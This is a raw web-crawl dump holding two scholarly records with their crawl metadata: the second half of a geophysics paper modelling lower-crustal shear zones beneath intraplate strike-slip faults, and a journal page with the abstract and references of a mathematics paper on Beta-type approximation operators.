s}}$$) and frictional heating ($$H_{{\\rm f}}$$). $$\\rho$$ is the density, and $$C_{{\\rm p}}$$ is the specific heat capacity at constant pressure. The heat produced by shear per unit time and volume is given by\n\n\\begin{aligned} H_{{\\rm s}}=\\tau _{ij}\\dot{\\varepsilon }_{ij}. \\end{aligned}\n(11)\n\nThe heat produced by friction is approximated by the volumetric heating on a column of the grid closest to the fault (Leloup et al. 1999):\n\n\\begin{aligned} H_{{\\rm f}}=\\tau _{{\\rm f}}\\dfrac{v_{0}}{\\Delta x}, \\end{aligned}\n(12)\n\nwhere $$\\tau _{{\\rm f}}$$ is the frictional resistance defined in Eq. 8 and $$\\Delta x$$ is the width along the x-axis of the considered unit cell. We solved the heat flow equation in a 2-D space perpendicular to the fault (Fig. 1). In each time step, we assumed that the velocity is constant in time, and we solved the stress equilibrium equation for the velocity field. Because motion is purely horizontal, the only nonzero components of the stress are $$\\tau _{yx}$$ and $$\\tau _{yz}$$:\n\n\\begin{aligned} \\dfrac{\\partial \\tau _{yx}}{\\partial x}+\\dfrac{\\partial \\tau _{yz}}{\\partial z} =0. \\end{aligned}\n(13)\n\nAll numerical calculations in this study were performed by using MATLAB. We used the Partial Differential Equation Toolbox to solve the mechanical equations, and we used the Alternating Direction Implicit finite difference method to solve the heat flow equation. The calculations were performed on a grid containing 700 $$\\times$$ 600 (420,000) cells, each of which is 50 m in both of its width and height directions. Although a finer grid could give a more accurate solution, the overall pattern of the solutions is insensitive to the chosen grid size, as confirmed by simulations using a finer grid with a half grid size. We simulated the fault slip and temperature evolution by using the adaptive time step (e.g., Thatcher and England 1998) controlled by the amount of heat production. We calculated the temperature rise during 3 Myr because the initiation ages of active faulting in the inland areas of Japan are mostly less than 3 Myr (Doke et al. 2012).\n\n## Results\n\nEffective viscosity of a rock depends on several environmental conditions such as shear stress, grain size, and temperature. In this section, we present the calculation results of shear stress and grain size distribution obtained by applying a 1-D linear geothermal gradient to evaluate the effects of grain size and power-law rheology. Moreover, we show the temperature anomaly produced by shear and frictional heating and the effective viscosity distribution.\n\n### Shear stress\n\nAs shown in Fig. 3b, the shear stress $$\\tau _{yz}$$ becomes very large ($${>}700$$ MPa) around point $$x = 0, z = z_{b}$$. This is because the effective viscosity is extremely large in the semi-brittle regime and the elasticity of rock has not been considered in this study. As the depth increases, $$\\tau _{yz}$$ quickly decreases. At the depth greater than the depth of BDT, $$\\tau _{yz}$$ becomes negligible compared with $$\\tau _{yx}$$, and the maximum shear stress $$\\tau _{{\\rm s}}$$ is nearly equal to $$\\tau _{yx}$$. Therefore, the distribution of maximum shear stress in the lower crust below the BDT is considered to be a result of far-field loading and we focus our discussion to the lower crust below BDT.\n\nFigure 4 shows the distribution of the maximum shear stress in the lower crust for our 6 cases. The depth of the BDT is different in each case, as is shown by gray broken lines in Figure 4. Compared with the wet anorthite, the dry anorthite requires a higher temperature to cause plastic deformation. The brittle region extends deeper into the crust (28–29 km depth), and the BDT for the dry anorthite case is about 8 km deeper than the cases of wet anorthite. Therefore, $$z_{{\\rm b}}$$ was set at a depth of 25 km for the model with dry anorthite. In the case of interplate strike-slip faults (Fig. 4c, f), the shear stress is only slightly larger, and the BDT is about 2 km deeper than that for intraplate cases (Fig. 4a, d). However, the slip rate of an interplate strike-slip fault is 30 times larger than that of an intraplate strike-slip fault. Therefore, the shear stress in the lower crust and the depth of the BDT is not sensitive to the fault slip rate. Shear stress concentrates around the down-dip extension of the fault. The largest shear stress is located at the depth of the BDT. Shear stress drops with depth and distance from the fault.\n\n### Grain size distribution\n\nWe calculated $$L_{{\\rm EGS}}$$ by balancing the shear strain rate of diffusion creep and dislocation creep. As examples, $$L_{{\\rm EGS}}$$ obtained by the model W1E and model D1E with an initial temperature field is shown in Fig. 5. Small grains are located in highly sheared region because both $$L_{{\\rm EGS}}$$ and shear strain rate depend on temperature and shear stress (Eq. 5 and Fig. 4). In our models, the minimum grain sizes are located at the depth of BDT under the fault where shear stress becomes the largest, nearly equal to the frictional strength of the fault. In models W1E and D1E, the minimum grain sizes are $$\\sim$$215 and $$\\sim$$17 $$\\upmu \\mathrm{m}$$ at temperatures of $$\\sim$$475 and $$\\sim$$700 $$^\\circ$$C, respectively. The results of grain size measurements show that the plagioclase grains in ultramylonites have a mean diameter of 16 (Okudaira et al. 2015) and 85 $$\\upmu \\mathrm{m}$$ (Okudaira et al. 2017) under the condition of $$\\sim$$700 and $$\\sim$$600 $$^\\circ$$C, respectively. Although our results of EGS are in agreement with these observations, comparison of the calculated results with the field observations is not straightforward. For example, the shear stress on the fault could be smaller than that estimated from Byerlee’s law (Iio 1997). Also, even with the same temperature and stress conditions, dynamically recrystallized grain size may be still larger than $$L_{{\\rm EGS}}$$ (Bresser et al. 2001).\n\nOutside the narrow mylonite zone, materials composed of relatively coarse grain size (up to few centimeters) are widely exposed over wide area (e.g., Markl 1998). Our calculation with EGS provides a fairly reasonable grain size distribution. However, in the far field where both temperature and shear stress is low, calculated $$L_{{\\rm EGS}}$$ reaches several tens of centimeters, which is not realistic. This result may be ascribed to our assumptions of instantaneous grain growth following the equation for $$L_{{\\rm EGS}}$$. The mechanisms that limit grain size, such as the Zener pinning effect (e.g., Hillert 1988; Rohrer 2010), are not considered in this study.\n\n### Shear and frictional heating\n\nFigure 6 shows temperature anomalies of 3 Myr after shearing and fault sliding were initiated. Assuming wet anorthite rheology for the lower crust, the maximum temperature increases for models W1E and W30E are about 15 and 219 K, respectively. The temperature increase for the case of an intraplate strike-slip fault is much lower than that for an interplate strike-slip fault. The temperature change is largely affected by frictional heating. Temperature rise creates a peak of heat flow anomaly on the fault trace. For an interplate strike-slip fault, the peak heat flow anomaly is $$\\sim$$55 $$\\hbox{mW/m}^2$$ above the background heat flow which is 65 $$\\hbox{mW/m}^2$$ (Fig. 7b). On the contrary, for an intraplate strike-slip fault, the expected heat flow anomaly is very small, less than 5% of the background value. Therefore, we cannot expect to detect a heat flow anomaly for the intraplate case (Tanaka et al. 2004). To illustrate how rock rheology affects the temperature increase, we also performed a calculation using dry anorthite (strong rheology). Figure 6b shows that the maximum temperature increase for the D1E model is about 22 K, which is higher than that for the wet anorthite case but still insufficient for causing an observable heat flow anomaly at the surface.\n\n### Effective viscosity\n\nThe effective viscosity structure strongly depends on assumptions applied for calculation, as shown in Fig. 8. For intraplate cases, the effective viscosity is about $$10^{22.5}$$ Pa s at the BDT under the fault. For the interplate case, in which the shear strain rate and shear stress are higher than those in the intraplate cases, the effective viscosity (Fig. 8c) becomes as small as about $$10^{21}$$Pa s at the BDT under the fault.\n\nThe effective viscosity of dislocation creep is extremely high when stress is relatively small. In models assuming EGS, dislocation creep and diffusion creep had the same effective viscosity in our calculation. The effective viscosity at the far field and at the top of the lower crust is larger than $$10^{25}$$ Pa s because of the relatively low temperature and small stress. In these regions, rocks behave like a rigid body.\n\nOn the other hand, in models assuming CGS, diffusion creep becomes the dominate deformation mechanism where stress is relatively small. Owing to the linear geothermal gradient, the effective viscosity has a layered structure in the far field. In the shear zone where the stress is large, dislocation creep dominates. The broken lines in Fig. 8d–f show the location in which dislocation creep and diffusion creep with a grain size of 500 $$\\upmu \\mathrm{m}$$ have equal contribution. Dislocation creep dominates on the left side, and diffusion creep dominates on the right side of the broken line.\n\nA comparison of wet and dry anorthite shows that the effective viscosity is significantly lowered by the present of water, whereas in previous studies of interplate strike-slip faults (e.g., Takeuchi and Fialko 2013; Moore and Parsons 2015), due to the elevated temperature field, the effective viscosity for wet and dry rheologies has similar magnitude in the center of the shear zone. This is not the case in the intraplate strike-slip fault, because change in effective viscosity structure due to shear and frictional heating is negligible.\n\n## Discussion\n\nIn this section, we discuss the relative importance of candidate mechanisms for the formation and maintenance of the shear zone in the lower crust beneath an intraplate strike-slip fault.\n\nShear, as well as frictional heating, has been considered as a main cause of the lower crustal shear zone beneath a fault and the associated heat flow anomaly for interplate strike-slip faults such as the San Andreas Fault (e.g., Lachenbruch and Sass 1980; Leloup et al. 1999). We compared the shear strain rate obtained from a temperature field of 3 Myr (solid line in Fig. 9) and that obtained from an initial temperature field (broken line in Fig. 9). For the interplate strike-slip fault, a significant increase in temperature occurred around the fault tip at a depth of about 12 km (Fig. 6c). Our result of temperature increase in model W30E is consistent with the results of recent thermo-mechanical models of interplate strike-slip faults (e.g., Takeuchi and Fialko 2012; Moore and Parsons 2015). The maximum temperature increase in the cases of wet rheologies is $$\\sim$$200 °C, and the effective viscosity was significantly lowered by the increased temperature. A comparison with the shear strain rate with the 1-D linear geothermal gradient revealed that the shear zone became narrower and the depth of BDT became shallower (Fig. 9b) after temperature is increased, which indicates that the depths of BDT for interplate strike-slip faults are time dependent.\n\nOn the contrary, for the case of the intraplate strike-slip fault (Fig. 9a), the shear strain rate change during 3 Myr was negligible because the temperature increase was minimal ($$\\sim$$20 /650 K). So shear and frictional heating on long-term (geological time scale) thermal structures is negligible for intraplate strike-slip faults. We conclude that such heating is not the main cause of the formation of shear zone under intraplate faults.\n\nThe amount of heat generated by shear and frictional heating can be increased by the absence of water. In the previous studies (e.g., Takeuchi and Fialko 2012; Moore and Parsons 2015), the temperature increase in the cases of dry rheologies is about 200 °C higher than that in the cases of wet rheologies. In our study, the effect of water on temperature increase is not significant because the maximum shear strain rate (Fig. 10) and shear stress (Fig. 4) is insensitive to the rock rheology. Instead, the depth increase in BDT due to the absence of water is ~8 km, which is equivalent to a temperature increase of ~200 °C.\n\nIn the current model, the degree of shear strain concentration was influenced by the assumption of rheology. Deformation was more localized in the cases of power-law fluid (Fig. 10a, b) than in the case of Newtonian fluid (Fig. 10c). A comparison of the results of models W1E and W1C revealed that shear strain rate distributions are similar in the shear zone, implying that in the current study, the assumption of grain size dose not affect shear strain concentration. Therefore, weakening due to power-law rheology is the most important mechanism in the formation of the shear zone in the lower crust. However, it should be noted that we only consider diffusion creep as a grain size dependent creep in this study. In the fine grained mylonites, deformation mechanisms other than diffusion creep, such as grain boundary sliding (Boullier and Gueguen 1975; White 1979) could occur to further reduce the strength of rocks and enhance shear strain localization.\n\nOnce a shear zone has been formed in the lower crust, the strength heterogeneity produced by the material with small grain sizes will remain over a geological time scale (~108 years, Tullis and Yund 1982). Commonly observed mylonite near exhumed shear zones (White et al. 1980) shows evidence for these long-lived weak zones beneath intraplate faults. Thus, lower shear strengths are maintained by materials with small grain sizes and strain localization should be a common feature for many active faults.\n\nIn the far field, although the shear strain rate in the W1C model was larger than that in W1E, the shear stress in the cases of CGS is smaller than that for the cases of EGS because the effective viscosity is significantly lowered by the diffusion creep. Because the shear strain rate in the far field is much smaller than that in the shear zone, the deformation in the far field has almost no influence on the deformation in the localized shear zone.\n\nA simplifying assumption in our calculation is that EGS is achieved instantaneously, which may not be realistic. According to the model of Bresser et al. (1998), grain size evolves toward EGS depending on the strain rate at each location. Since the strain rate distribution in our calculation does not significantly change with time, the resulting EGS can be considered as the result of long-term steady-state deformation. Our results demonstrate that a relative motion across an intraplate fault, no matter how slow it moves, can create characteristic grain size distribution and corresponding strain localization in the lower crust. The model also predicts that lower crustal rocks in the far field should be like a rigid body. Studies of post-seismic deformation showed that plastic flow in the lower crust after the 1992 Landers and 1999 Hector Mine earthquakes was not significant (Pollitz 2001; Freed et al. 2007). Our result of the effective viscosity structure with the EGS assumption is in good agreement with such observation because in that case, the plastic deformation is limited in a narrow shear zone under the fault.\n\nFor interplate strike-slip faults, Savage and Burford (1973) proposed a kinematic model with a buried dislocation in an elastic half-space; this model has been used to explain geodetically observed interseismic strain accumulation. For intraplate strike-slip faults, a similar dislocation model has been applied and yielded a reasonable estimate of the fault-locking depth (e.g., Ohzono et al. 2011). The current model demonstrates that such a localized shear zone appears even in an intraplate case with a very low slip rate. This provides a physical basis for applicability of the Savage and Burford (1973) model to intraplate strike-slip faults.\n\n## Conclusion\n\nWe have considered the formation and maintenance of the shear zone under an intraplate strike-slip fault. Models that incorporate laboratory-derived temperature-dependent power-law rheology, grain size, and shear and frictional heating are examined to understand the mechanism and boundary conditions that influence the deformation of the lower crust. Water is very important to reduce the temperature requirement for plastic deformation in the lower crust, as for wet anorthite, deformation is fully plastic at temperature of $$\\sim$$475 °C, whereas for dry anorthite is $$\\sim$$700 °C. The temperature anomaly owing to 3 Myr of heat generation on an intraplate strike-slip fault is negligibly small. In our model, dynamically recrystallized materials with small grain sizes are important for maintaining a shear zone on a geological time scale of $${\\sim}10^{8}$$ years. The degree of shear strain concentration is controlled by the weakening effect due to nonlinear relation between shear strain rate and stress (power-law rheology).\n\n## Abbreviations\n\nBDT:\n\nbrittle–ductile transition\n\ndiff.:\n\ndiffusion creep\n\ndisl.:\n\ndislocation creep\n\nEGS:\n\nequilibrium grain size\n\nCGS:\n\nconstant grain size\n\n## References\n\n1. Boullier A, Gueguen Y (1975) Sp-mylonites: origin of some mylonites by superplastic flow. Contrib Mineral Petrol 50(2):93–104\n\n2. Bürgmann R, Dresen G (2008) Rheology of the lower crust and upper mantle: evidence from rock mechanics, geodesy, and field observations. Ann Rev Earth Planet Sci 36(1):531\n\n3. Byerlee JD (1978) Friction of rocks. Pure Appl Geophys 116(4–5):615–626\n\n4. De Bresser J, Peach C, Reijs J, Spiers C (1998) On dynamic recrystallization during solid state flow: effects of stress and temperature. Geophys Res Lett 25(18):3457–3460\n\n5. De Bresser J, Ter Heege J, Spiers C (2001) Grain size reduction by dynamic recrystallization: Can it result in major rheological weakening? Int J Earth Sci 90(1):28–45\n\n6. Doke R, Tanikawa S, Yasue K, Nakayasu A, Niizato T, Umeda K, Tanaka T (2012) Spatial patterns of initiation ages of active faulting in the Japanese Islands. Active Fault Res 37:1–15\n\n7. Fleitout L, Froidevaux C (1980) Thermal and mechanical evolution of shear zones. J Struct Geol 2(1–2):159–164\n\n8. Freed AM, Bürgmann R, Herring T (2007) Far-reaching transient motions after mojave earthquakes require broad mantle flow beneath a strong crust. Geophys Res Lett 34(19):L19302\n\n9. Fusseis F, Handy M, Schrank C (2006) Networking of shear zones at the brittle-to-viscous transition (cap de creus, ne spain). J Struct Geol 28(7):1228–1243\n\n10. Gueydan F, Leroy YM, Jolivet L (2001) Grain-size-sensitive flow and shear-stress enhancement at the brittle-ductile transition of the continental crust. Int J Earth Sci 90(1):181–196\n\n11. Hillert M (1988) Inhibition of grain growth by second-phase particles. Acta Metall 36(12):3177–3181\n\n12. Iio Y (1997) Frictional coefficient on faults in a seismogenic region inferred from earthquake mechanism solutions. J Geophys Res Solid Earth 102(B3):5403–5412\n\n13. Iio Y, Sagiya T, Kobayashi Y, Shiozaki I (2002) Water-weakened lower crust and its role in the concentrated deformation in the Japanese Islands. Earth Planet Sci Lett 203(1):245–253\n\n14. Iio Y, Sagiya T, Kobayashi Y (2004) Origin of the concentrated deformation zone in the japanese islands and stress accumulation process of intraplate earthquakes. Earth Planets Space 56(8):831–842\n\n15. Karato S (2012) Deformation of earth materials. An introduction to the rheology of solid earth, Chap 212. Cambridge University Press, Cambridge\n\n16. Lachenbruch AH, Sass J (1980) Heat flow and energetics of the San Andreas Fault Zone. J Geophys Res Solid Earth (1978–2012) 85(B11):6185–6222\n\n17. Leloup PH, Ricard Y, Battaglia J, Lacassin R (1999) Shear heating in continental strike-slip shear zones: model and field examples. Geophys J Int 136(1):19–40\n\n18. Little T, Holcombe R, Ilg B (2002) Kinematics of oblique collision and ramping inferred from microstructures and strain in middle crustal rocks, central Southern Alps, New Zealand. J Struct Geol 24(1):219–239\n\n19. Markl G (1998) The Eidsfjord anorthosite, Vesterålen, Norway: field observations and geochemical data. Norges Geologiske Undersokelse 434:53–76\n\n20. Montési LG, Hirth G (2003) Grain size evolution and the rheology of ductile shear zones: from laboratory experiments to postseismic creep. Earth Planet Sci Lett 211(1):97–110\n\n21. Moore JD, Parsons B (2015) Scaling of viscous shear zones with depth-dependent viscosity and power-law stress–strain-rate dependence. Geophys J Int 202(1):242–260\n\n22. Nakajima J, Hasegawa A (2007) Deep crustal structure along the Niigata–Kobe Tectonic Zone, Japan: its origin and segmentation. Earth Planets Space 59(2):e5\n\n23. Nakajima J, Kato A, Iwasaki T, Ohmi S, Okada T, Takeda T et al (2010) Deep crustal structure around the Atotsugawa fault system, central Japan: a weak zone below the seismogenic zone and its role in earthquake generation. Earth Planets Space 62(7):555–566\n\n24. Ogawa Y, Honkura Y (2004) Mid-crustal electrical conductors and their correlations to seismicity and deformation at Itoigawa–Shizuoka Tectonic Line, central Japan. Earth Planets Space 56(12):1285–1291\n\n25. Ohzono M, Sagiya T, Hirahara K, Hashimoto M, Takeuchi A, Hoso Y, Wada Y, Onoue K, Ohya F, Doke R (2011) Strain accumulation process around the Atotsugawa fault system in the Niigata–Kobe Tectonic Zone, central Japan. Geophys J Int 184(3):977–990\n\n26. Okudaira T, Jeřábek P, Stünitz H, Fusseis F (2015) High-temperature fracturing and subsequent grain-size-sensitive creep in lower crustal gabbros: Evidence for coseismic loading followed by creep during decaying stress in the lower crust? J Geophys Res Solid Earth 120(5):3119–3141\n\n27. Okudaira T, Shigematsu N, Harigane Y, Yoshida K (2017) Grain size reduction due to fracturing and subsequent grain-size-sensitive creep in a lower crustal shear zone in the presence of a Co2-bearing fluid. J Struct Geol 95:171–187. doi:10.1016/j.jsg.2016.11.001\n\n28. Pollitz FF (2001) Viscoelastic shear zone model of a strike-slip earthquake cycle. J Geophys Res 106(26):526–541\n\n29. Rohrer GS (2010) Introduction to grains, phases, and interfacesan interpretation of microstructure. Trans Aime, 1948, vol 175, pp 15–51, by cs smith. Metall Mater Trans A 41(5):1063–1100\n\n30. Rutter E (1999) On the relationship between the formation of shear zones and the form of the flow law for rocks undergoing dynamic recrystallization. Tectonophysics 303(1):147–158\n\n31. Rybacki E, Gottschalk M, Wirth R, Dresen G (2006) Influence of water fugacity and activation volume on the flow properties of fine-grained anorthite aggregates. J Geophys Res Solid Earth 111(B3):B03203\n\n32. Savage J, Burford R (1973) Geodetic determination of relative plate motion in central California. J Geophys Res 78(5):832–845\n\n33. Shimada K, Tanaka H, Toyoshima T, Obara T, Niizato T (2004) Occurrence of mylonite zones and pseudotachylyte veins around the base of the upper crust: An example from the southern Hidaka metamorphic belt, Samani area, Hokkaido, Japan. Earth Planets Space 56(12):1217–1223\n\n34. Takahashi Y (2015) Geotectonic evolution of the Nihonkoku Mylonite Zone of north central Japan based on geology, geochemistry, and radiometric ages of the Nihonkoku Mylonites. In: Mukherjee S, Mulchrone KF (eds) Ductile shear zones: from micro- to macro-scales. Wiley, Chichester, UK\n\n35. Takeuchi CS, Fialko Y (2012) Dynamic models of interseismic deformation and stress transfer from plate motion to continental transform faults. J Geophys Res Solid Earth 117(B5):B05403\n\n36. Takeuchi CS, Fialko Y (2013) On the effects of thermally weakened ductile shear zones on postseismic deformation. J Geophys Res Solid Earth 118(12):6295–6310\n\n37. Tanaka A, Yamano M, Yano Y, Sasada M (2004) Geothermal gradient and heat flow data in and around Japan (i): Appraisal of heat flow from geothermal gradient data. Earth Planets Space 56(12):1191–1194\n\n38. Thatcher W, England PC (1998) Ductile shear zones beneath strike-slip faults: implications for the thermomechanics of the San Andreas Fault Zone. J Geophys Res Solid Earth 103(B1):891–905\n\n39. Tullis J, Yund RA (1982) Grain growth kinetics of quartz and calcite aggregates. J Geol 90:301–318\n\n40. White S (1979) Grain and sub-grain size variations across a mylonite zone. Contrib Mineral Petrol 70(2):193–202\n\n41. White S, Burrows S, Carreras J, Shaw N, Humphreys F (1980) On mylonites in ductile shear zones. J Struct Geol 2(1–2):175–187\n\n42. Wittlinger G, Tapponnier P, Poupinet G, Mei J, Danian S, Herquel G, Masson F (1998) Tomographic evidence for localized lithospheric shear along the Altyn Tagh fault. Science 282(5386):74–76\n\n43. Yoshimura R, Oshiman N, Uyeshima M, Toh H, Uto T, Kanezaki H, Mochido Y, Aizawa K, Ogawa Y, Nishitani T et al (2009) Magnetotelluric transect across the Niigata-Kobe tectonic zone, central Japan: a clear correlation between strain accumulation and resistivity structure. Geophys Res Lett 36(20):L20311\n\n44. Yuen D, Fleitout L, Schubert G, Froidevaux C (1978) Shear deformation zones along major transform faults and subducting slabs. Geophys J Int 54(1):93–119\n\n## Authors' contributions\n\nXZ constructed the numerical model for the study, conducted all numerical experiments and drafted the manuscript. TS conceived of the study, participated in its design and coordination and helped to draft the manuscript. Both authors read and approved the final manuscript.\n\n## Author information\n\nCorrespondence to Xuelei Zhang.\n\n## Ethics declarations\n\n### Acknowledgements\n\nThe authors would like to thank T. Ito and R. Sasajima for providing kind supervision, helpful comments, and continued support. Constructive reviews by J. Muto, T. Okudaira, and an anonymous reviewer improved the manuscript. This study was supported by JSPS KAKENHI Grant Number 261090003. The corresponding author was supported by a Japanese Government Scholarship for his study in Japan.\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n### Publisher’s Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Rights and permissions", null, "" ]
[ null, "https://earth-planets-space.springeropen.com/track/article/10.1186/s40623-017-0668-5", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86902773,"math_prob":0.9798194,"size":39272,"snap":"2019-51-2020-05","text_gpt3_token_len":9614,"char_repetition_ratio":0.1587043,"word_repetition_ratio":0.038618885,"special_character_ratio":0.23933083,"punctuation_ratio":0.10831854,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9840415,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-17T16:00:44Z\",\"WARC-Record-ID\":\"<urn:uuid:a86982b9-642e-4716-8a25-e6d277928763>\",\"Content-Length\":\"269056\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c5ca92c4-6c20-4598-b438-36200f440c17>\",\"WARC-Concurrent-To\":\"<urn:uuid:18352320-7d55-4f45-9ff7-7ae871580ab7>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://earth-planets-space.springeropen.com/articles/10.1186/s40623-017-0668-5\",\"WARC-Payload-Digest\":\"sha1:F7VICJPTDDS6JXU7OAVE6CR4HCGQNKBZ\",\"WARC-Block-Digest\":\"sha1:AOTNKFCDTMULBFFZDRA2O3HEAPJNIRXX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250589861.0_warc_CC-MAIN-20200117152059-20200117180059-00243.warc.gz\"}"}
https://www.lhscientificpublishing.com/journals/articles/DOI-10.5890-DNC.2021.12.006.aspx
[ "", null, "ISSN:2164-6376 (print)\nISSN:2164-6414 (online)\nDiscontinuity, Nonlinearity, and Complexity\n\nDimitry Volchenkov (editor), Dumitru Baleanu (editor)\n\nDimitry Volchenkov(editor)\n\nMathematics & Statistics, Texas Tech University, 1108 Memorial Circle, Lubbock, TX 79409, USA\n\nEmail: [email protected]\n\nDumitru Baleanu (editor)\n\nCankaya University, Ankara, Turkey; Institute of Space Sciences, Magurele-Bucharest, Romania\n\nA Study of Approximation Properties of Beta Type Summation-Integral Operator\n\nDiscontinuity, Nonlinearity, and Complexity 10(4) (2021) 649--662 | DOI:10.5890/DNC.2021.12.006\n\nDhawal J. Bhatt$^{1,2}$, Vishnu Narayan Mishra$^{3}$ , Ranjan Kumar Jana$^{1}$\n\n$^{1}$ Applied Mathematics and Humanities Department, Sardar Vallabhbhai National Institute of Technology, Ichchhanath, Surat-395 007, Gujarat, India\n\n$^{2}$ Present address: Department of Mathematics, St. Xavier's College, Navrangpura, Ahmedabad- 380 009, Gujarat, India\n\n$^{3}$ Department of Mathematics, Indira Gandhi National Tribal University, Lalpur, Amarkantak, Anuppur- 484 887, Madhya Pradesh, India\n\nAbstract\n\nIn the present paper we introduce Durrmeyer-type operator involving the beta function and Baskakov basis function and study its approximation properties. We obtain the rate of convergence in different terms. The uniform convergence of sequence of these operators is achieved using Korovkin's theorem. Order of approximation for functions of some special class is also obtained. We establish the Voronovskaja type asymptotic result for this operator and a direct estimate of approximation for sequence of these operator.\n\nReferences\n\n1. Sz{\\a}sz, O. (1950), Generalizations of S. Bernstein`s polynomial to the infinite interval, J. Res. Nat. Bur. Standards, {\\bf{45}}, 239-245.\n2. Baskakov, V.A. (1957), An example of a sequence of linear positive operators in the space of continuous functons, Dokl. Akad. Nauk. SSSR., {\\bf{113}}, 249-251.\n3. Durrmeyer, J.L. (1967), Une formule dinversion de la transform{\\e}e de Laplace: Applications {\\a} la th{\\e}orie des moments, Th{\\ese de 3e cycle, Facult{\\e} des Sciences de IUniversit{\\e} de Paris}.\n4. Bernstein, S.N. (1912), Demonstration du Theorem de Weierstrass Fondee sur le Calculu des Probabilites, Comp. Comm. Soc. Mat. Charkow Ser., {\\bf{13}}(2), 1-2.\n5. Prasad, G., Agrawal, P.N., and Kasana, H.S. (1983), Approximation of functions on $[0,\\infty)$ by a new sequence of modified Sz{\\a}sz operators, Math. Forum, {\\bf{6}}(2), 1-11.\n6. Gupta, V. and Srivastava, G.S. (1993), Simultaneous approximation by Baskakov-Sz{\\a}sz type operators, Bull. Math. Soc. Sci. de Roumanie (N.S.), {\\bf{37(85)}}(3-4), 73-85.\n7. Agrawal, P.N. and Mohammad, A.J. (2003), On $L_p$ approximation by a linear combination of a new sequence of linear positive operators, Turk. J. Math., {\\bf{27}}, 389-405.\n8. Gairola, A.R. and Mishra, L.N. (2016), Rate of Approximation by Finite Iterates of q- Durrmeyer Operators, Proc. Natl. Acad. Sci., India, Sect. A Phys. Sci. (April-June 2016), {\\bf 86}(2), 229-234. DOI:10.1007/s40010-016-0267-z.\n9. Gairola, A.R. and Mishra, L.N. (2018), On the $q-$derivatives of a certain linear positive operators, Iranian Journal of Science \\& Technology, Transactions A: Science, {\\bf 42}(3), 1409-1417. DOI:10.1007/s40995-017-0227-8.\n10. Gupta, V., Deo, N., and Zeng, X.M. (2013), Simultaneous approximation for Sz{\\a}sz-Mirakian-Stancu-Durrmeyer operators, Anal. Theory Appl., {\\bf{29}}(1), 86-96.\n11. Gupta, V. and Gupta, P. (2001), Direct theorem in simultaneous approximation for Sz{\\a}sz-Mirakyan-Baskakov type operators, Kyungpook Math. J., {\\bf{41}}(2), 243-249.\n12. Gupta, V. and Lupas, A. (2005), Direct results for mixed Beta-Sz{\\a}sz type operators, Gen. Math., {\\bf{13}}(2), 83-94.\n13. Gupta, V. and Srivastava, G.S. (1995), On convergence of derivatives by Sz{\\a}sz-Mirakyan-Baskakov type operators, Math. Stud., {\\bf{64}}(1-4), 195-205.\n14. Gupta, V. and Tachev, G. (2014), Approximation by Sz{\\a}sz-Mirakyan-Baskakov operators, J. Appl. Funct. Anal., {\\bf{9}}(3-4), 308-309.\n15. Kumar, A. and Mishra, L.N. (2017), Approximation by modified Jain-Baskakov-Stancu operators, Tbilisi Mathematical Journal, {\\bf 10}(2), 185-199.\n16. Kumar, A., Tapiawala, D., and Mishra, L.N. (2018), Direct estimates for certain integral type Operators, European Journal of Pure and Applied Mathematics, {\\bf 11}(4), 958-975.\n17. Mishra, L.N. and Kumar, A. (2019), Direct estimates for Stancu variant of Lupa\\c{s}-Durrmeyer operators based on Polya distribution, Khayyam J. Math., {\\bf 5}(2), 51-64. DOI:10.22034/KJM.2019.85886.\n18. Mishra, V.N., Khatri, K., Mishra, L.N., and Deepmala (2013), Inverse result in simultaneous approximation by Baskakov-Durrmeyer-Stancu operators, Journal of Inequalities and Applications, 2013, 586. DOI:10.1186/1029-242X-2013-586.\n19. Mishra, V.N., Khatri, K., and Mishra, L.N. (2013), Statistical approximation by Kantorovich type Discrete $q-$Beta operators, Advances in Difference Equations, 2013, 345. DOI:10.1186/10.1186/1687-1847-2013-345.\n20. Korovkin, P.P. (1953), On Convergence of Linear Positive Operators in the Space of Continuous Functions, Dokl. Akad. Nauk, {\\bf{90}}, 961-964.\n21. Mazhar, S.M. and Totik, V. (1985), Approximation by modified Sz{\\a}sz operators, Acta Sci. Math., {\\bf{49}}, 257-269." ]
[ null, "https://www.lhscientificpublishing.com/Journals/images/cover_Journal-DNC.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6149648,"math_prob":0.8808782,"size":5101,"snap":"2022-27-2022-33","text_gpt3_token_len":1741,"char_repetition_ratio":0.14734158,"word_repetition_ratio":0.014124294,"special_character_ratio":0.37345618,"punctuation_ratio":0.2895888,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9660822,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-14T12:11:37Z\",\"WARC-Record-ID\":\"<urn:uuid:118004cc-ffa1-414b-b856-544a99ef8405>\",\"Content-Length\":\"27093\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9e6edd4a-db2f-4b8f-b9e6-088f52190934>\",\"WARC-Concurrent-To\":\"<urn:uuid:07e01198-96f4-4531-ab40-6ea7b416fc27>\",\"WARC-IP-Address\":\"143.95.144.128\",\"WARC-Target-URI\":\"https://www.lhscientificpublishing.com/journals/articles/DOI-10.5890-DNC.2021.12.006.aspx\",\"WARC-Payload-Digest\":\"sha1:2QQFF334NKEIMQIJPXDQZEZ7OYS7GUX2\",\"WARC-Block-Digest\":\"sha1:K536BIWCFQRFMKBOOQLXCPEYGFPM4ZP6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572033.91_warc_CC-MAIN-20220814113403-20220814143403-00338.warc.gz\"}"}
